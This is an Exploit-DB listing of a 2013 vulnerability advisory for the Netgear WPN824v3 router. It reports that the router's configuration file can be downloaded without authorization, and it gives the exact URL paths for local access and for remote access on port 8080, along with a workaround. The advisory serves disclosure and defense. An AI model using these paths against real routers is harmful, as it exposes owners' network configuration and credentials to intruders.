Netgear WPN824v3 - Unauthorized Configuration Download

EDB-ID:

25969

CVE:


EDB Verified:

Author:

Jens Regel

Type:

webapps

Exploit:   /  

Platform:

Hardware

Date:

2013-06-05

Vulnerable App: 
Title:
======
Netgear WPN824v3 Unauthorized Config Download

Date:
=====
2013-06-03

Introduction:
=============
The Netgear RangeMax Wireless Router (model WPN824v3) allows to download
the config file without authorization.

Status:
========
Published

Affected Products:
==================
Netgear WPN824v3

Vendor Homepage:
================
http://support.netgear.com/product/WPN824v3

Exploitation-Technique:
=======================
Local and Remote

Details:
========
I found a bug in the Netgear WPN824v3 wireless router, everyone is able
to download the full config file without authorization.
Unfortunately the config file is not htaccess protected.
Tested with latest firmware V1.0.8_1.0.6.

Proof of Concept:
=================
The vulnerability can be exploited with your browser:

http://[local-ip]/cgi-bin/NETGEAR_wpn824v3.cfg

If remote management is enabled:

http://[remote-ip]:8080/cgi-bin/NETGEAR_wpn824v3.cfg

Workaround:
=========
Disable the remote management feature!

Author:
========
Jens Regel <jens@loxiran.de>
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services